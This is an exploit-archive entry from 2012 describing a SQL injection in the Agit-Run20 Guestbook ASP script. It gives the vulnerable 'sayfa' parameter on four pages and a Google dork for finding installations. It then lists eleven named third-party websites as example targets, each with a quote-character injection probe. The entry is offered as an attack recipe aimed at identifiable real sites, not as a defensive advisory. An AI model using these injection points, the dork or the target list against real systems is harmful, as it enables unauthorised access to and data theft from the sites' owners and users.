Agit-Run20 Guestbook SQL injection



EKU-ID: 1933 CVE: OSVDB-ID:
Author: CWpisagor Published: 2012-04-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################################
# Exploit Title:  Agit-Run20 Guestbook SQL injection
# Date: 15-04-2012
# Author: CWpisagor
# Script Download: http://www.hotscripts.com/listings/jump/download/117358
# Category:: Webapps
# Google dork: "Agit-Run20"
# Tested on: Windows 7
##################################################################


www.server.com/path/gb.asp?sayfa=[SQL]

www.server.com/path/Run20.asp?sayfa=[SQL]

www.server.com/path/default.asp?sayfa=[SQL]

www.server.com/path/defter.asp?sayfa=[SQL]



Example Site


http://www.mallepillen.dk/gb.asp?sayfa=2'

http://ankarakucukozlukoyudernegi.com/ziyaretcidefteri/Run20.asp?sayfa=6'

http://www.avlunlar.com/ziyaretcidefteri/Run20.asp?sayfa=2'

http://agitkaplan.brinkster.net/run20/default.asp?sayfa=4'

http://www.minoxil.org/yorumlar/default.asp?sayfa=3'

http://www.kankalite.com/Tr/run20/default.asp?sayfa=2'

http://www.mehmeteti.net/ziyaretci_defteri/default.asp?sayfa=2'

http://www.muratertan.com/yorumcu.asp?sayfa=58'

http://www.gumrukmuhafazahaber.com/haftaninsorusu/?sayfa=2'

http://www.suzeykoyu.com/defter.asp?sayfa=2'

http://www.kankalite.com/Tr/run20/default.asp?sayfa=3'


Thanks : Volqan , CWKaraKule , Beyaz_Sancak , Servan , Hizmetkar , Mad_Boy and Cyber-Warrior All Users